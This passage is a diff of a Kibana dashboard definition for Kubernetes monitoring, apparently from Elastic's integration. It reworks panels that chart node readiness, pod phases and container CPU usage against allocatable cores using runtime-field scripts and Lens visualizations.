"fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" 
+ }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" }, - "gridData": { - "h": 4, - "i": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", - "w": 33, - "x": 0, - "y": 0 - }, - "panelIndex": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "31c14ad9-51fd-465c-957c-b0171c23a0bb": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "31c14ad9-51fd-465c-957c-b0171c23a0bb", + "name": "state_nodes", + "runtimeFieldMap": { + "nodes_not_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"false\") { emit(1) }" + }, + "type": "long" + }, + "nodes_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "b0224778-49e2-4916-aa97-55d3b4ddf6c1": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "b0224778-49e2-4916-aa97-55d3b4ddf6c1", + "name": "nodes-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == false) { emit(1) }" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == true) { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732": { + 
"allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", + "name": "state_node-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"false\" || doc['kubernetes.node.status.ready'].value == \"unknown\") { emit(1) }" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "977fa7a0-b026-427b-8ffd-ee07fd69b50e", + "1b46f7a2-12d8-4773-87db-118234d45186", + "4314b1bf-95bb-477a-9708-ff7324356bda", + "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" + ], + "columns": { + "1b46f7a2-12d8-4773-87db-118234d45186": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "description": "", - "id": "", - "params": { - "fontSize": 10, - "markdown": "This dashboard requires having [`kube-state-metrics`](https://github.com/kubernetes/kube-state-metrics#kubernetes-deployment) deployed to your Kubernetes cluster to function properly. 
\nCheck the **Section: state_\\* and event** of the [Elastic Kubernetes integration](https://docs.elastic.co/en/integrations/kubernetes).", - "openLinksInNewTab": false + "4314b1bf-95bb-477a-9708-ff7324356bda": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "ready" }, - "title": "", - "type": "markdown", - "uiState": {} + "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "not_ready" + }, + "977fa7a0-b026-427b-8ffd-ee07fd69b50e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "4314b1bf-95bb-477a-9708-ff7324356bda", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "31c14ad9-51fd-465c-957c-b0171c23a0bb", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_node" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" } + } + } + ], + "internalReferences": [ + { + "id": 
"d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "4314b1bf-95bb-477a-9708-ff7324356bda", + "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "977fa7a0-b026-427b-8ffd-ee07fd69b50e", + "xAccessor": "1b46f7a2-12d8-4773-87db-118234d45186", + "yConfig": [ + { + "color": "#a63a38", + "forAccessor": "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" + }, + { + "color": "#00bfb3", + "forAccessor": "4314b1bf-95bb-477a-9708-ff7324356bda" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false }, - "gridData": { - "h": 4, - "i": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", - "w": 15, - "x": 33, - "y": 0 - }, - "panelIndex": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", - "title": "Information", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == 
\"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "31c14ad9-51fd-465c-957c-b0171c23a0bb": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "31c14ad9-51fd-465c-957c-b0171c23a0bb", - "name": "state_nodes", - "runtimeFieldMap": { - "nodes_not_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"false\") { emit(1) }" - }, - "type": "long" - }, - "nodes_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "b0224778-49e2-4916-aa97-55d3b4ddf6c1": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "b0224778-49e2-4916-aa97-55d3b4ddf6c1", - "name": "nodes-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == false) { emit(1) }" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == true) { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - 
"d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", - "name": "state_node-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"false\" || doc['kubernetes.node.status.ready'].value == \"unknown\") { emit(1) }" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Nodes" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", + "w": 20, + "x": 28, + "y": 4 + }, + "panelIndex": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fbaf3405-fab6-4f09-883d-45368cf97670", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 
"c165f898-73a9-48b1-afa9-2b6e75f3cc1f": { + "columnOrder": [ + "7113c7e7-1af9-4350-b5d2-57abcb60c633", + "af01f323-afc0-4b55-b453-8da15facfc28", + "830de93b-4051-4716-99e4-83d625a91288X0", + "830de93b-4051-4716-99e4-83d625a91288X1", + "830de93b-4051-4716-99e4-83d625a91288" + ], + "columns": { + "7113c7e7-1af9-4350-b5d2-57abcb60c633": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.container.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "977fa7a0-b026-427b-8ffd-ee07fd69b50e", - "1b46f7a2-12d8-4773-87db-118234d45186", - "4314b1bf-95bb-477a-9708-ff7324356bda", - "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" - ], - "columns": { - "1b46f7a2-12d8-4773-87db-118234d45186": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "4314b1bf-95bb-477a-9708-ff7324356bda": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "ready" - }, - "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - 
"scale": "ratio", - "sourceField": "not_ready" - }, - "977fa7a0-b026-427b-8ffd-ee07fd69b50e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "4314b1bf-95bb-477a-9708-ff7324356bda", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "31c14ad9-51fd-465c-957c-b0171c23a0bb", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - } - ], - "internalReferences": [ - { - "id": "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "4314b1bf-95bb-477a-9708-ff7324356bda", - "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "977fa7a0-b026-427b-8ffd-ee07fd69b50e", - 
"xAccessor": "1b46f7a2-12d8-4773-87db-118234d45186", - "yConfig": [ - { - "color": "#a63a38", - "forAccessor": "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" - }, - { - "color": "#00bfb3", - "forAccessor": "4314b1bf-95bb-477a-9708-ff7324356bda" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.container.name" + }, + "830de93b-4051-4716-99e4-83d625a91288": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset :\"kubernetes.container\" " + }, + "isBucketed": false, + "label": "Cores Used", + "operationType": "formula", + "params": { + "format": { + "id": "number" + }, + "formula": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "isFormulaBroken": false + }, + "references": [ + "830de93b-4051-4716-99e4-83d625a91288X1" + ], + "scale": "ratio" + }, + "830de93b-4051-4716-99e4-83d625a91288X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset :\"kubernetes.container\" " + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.container.cpu.usage.nanocores" + }, + "830de93b-4051-4716-99e4-83d625a91288X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "830de93b-4051-4716-99e4-83d625a91288X0", + 
1000000000 + ], + "location": { + "max": 63, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "type": "function" } + }, + "references": [ + "830de93b-4051-4716-99e4-83d625a91288X0" + ], + "scale": "ratio" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "af01f323-afc0-4b55-b453-8da15facfc28": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" } + }, + "incompleteColumns": {} }, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "33530265-ff62-49e7-9518-f430efb0dde0", - "w": 8, - "x": 0, - "y": 4 - }, - "panelIndex": "33530265-ff62-49e7-9518-f430efb0dde0", - "title": "Nodes", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", - "type": "index-pattern" + "dde29dcf-00ae-4b80-8d9e-ab45c51efba0": { + "columnOrder": [ + "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", + "c609fc21-331c-4bbe-81c3-ef8251f3cf80", + "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" + ], + "columns": { + "c609fc21-331c-4bbe-81c3-ef8251f3cf80": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95": { + "customLabel": true, + "dataType": "number", + "filter": { + 
"language": "kuery", + "query": "data_stream.dataset :\"kubernetes.state_node\" and kubernetes.node.status.ready:\"true\" " + }, + "isBucketed": false, + "label": "Total Cores", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.node.cpu.allocatable.cores" + }, + "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "fbaf3405-fab6-4f09-883d-45368cf97670", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c165f898-73a9-48b1-afa9-2b6e75f3cc1f": { - "columnOrder": [ - "7113c7e7-1af9-4350-b5d2-57abcb60c633", - "af01f323-afc0-4b55-b453-8da15facfc28", - "830de93b-4051-4716-99e4-83d625a91288X0", - "830de93b-4051-4716-99e4-83d625a91288X1", - "830de93b-4051-4716-99e4-83d625a91288" - ], - "columns": { - "7113c7e7-1af9-4350-b5d2-57abcb60c633": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.container.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.container.name" - }, - 
"830de93b-4051-4716-99e4-83d625a91288": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.container\" " - }, - "isBucketed": false, - "label": "Cores Used", - "operationType": "formula", - "params": { - "format": { - "id": "number" - }, - "formula": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "isFormulaBroken": false - }, - "references": [ - "830de93b-4051-4716-99e4-83d625a91288X1" - ], - "scale": "ratio" - }, - "830de93b-4051-4716-99e4-83d625a91288X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.container\" " - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.container.cpu.usage.nanocores" - }, - "830de93b-4051-4716-99e4-83d625a91288X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "830de93b-4051-4716-99e4-83d625a91288X0", - 1000000000 - ], - "location": { - "max": 63, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "type": "function" - } - }, - "references": [ - "830de93b-4051-4716-99e4-83d625a91288X0" - ], - "scale": "ratio" - }, - "af01f323-afc0-4b55-b453-8da15facfc28": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "dde29dcf-00ae-4b80-8d9e-ab45c51efba0": { - "columnOrder": [ - 
"f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", - "c609fc21-331c-4bbe-81c3-ef8251f3cf80", - "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" - ], - "columns": { - "c609fc21-331c-4bbe-81c3-ef8251f3cf80": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.state_node\" and kubernetes.node.status.ready:\"true\" " - }, - "isBucketed": false, - "label": "Total Cores", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.cpu.allocatable.cores" - }, - "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "fbaf3405-fab6-4f09-883d-45368cf97670", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.container", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - 
"kubernetes.container", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.container" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.5, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "830de93b-4051-4716-99e4-83d625a91288" - ], - "collapseFn": "sum", - "layerId": "c165f898-73a9-48b1-afa9-2b6e75f3cc1f", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "area", - "splitAccessor": "7113c7e7-1af9-4350-b5d2-57abcb60c633", - "xAccessor": "af01f323-afc0-4b55-b453-8da15facfc28", - "yConfig": [ - { - "axisMode": "left", - "color": "#00bfb3", - "forAccessor": "830de93b-4051-4716-99e4-83d625a91288" - } - ] - }, - { - "accessors": [ - "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" - ], - "collapseFn": "sum", - "layerId": "dde29dcf-00ae-4b80-8d9e-ab45c51efba0", - "layerType": "data", - "palette": { - "name": "negative", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", - "xAccessor": "c609fc21-331c-4bbe-81c3-ef8251f3cf80", - "yConfig": [ - { - "axisMode": "left", - "color": "#bd271e", - "forAccessor": "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "top", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - 
"tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "fbaf3405-fab6-4f09-883d-45368cf97670", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.container", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.container", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.container" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "830de93b-4051-4716-99e4-83d625a91288" + ], + "collapseFn": "sum", + "layerId": "c165f898-73a9-48b1-afa9-2b6e75f3cc1f", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "area", + "splitAccessor": 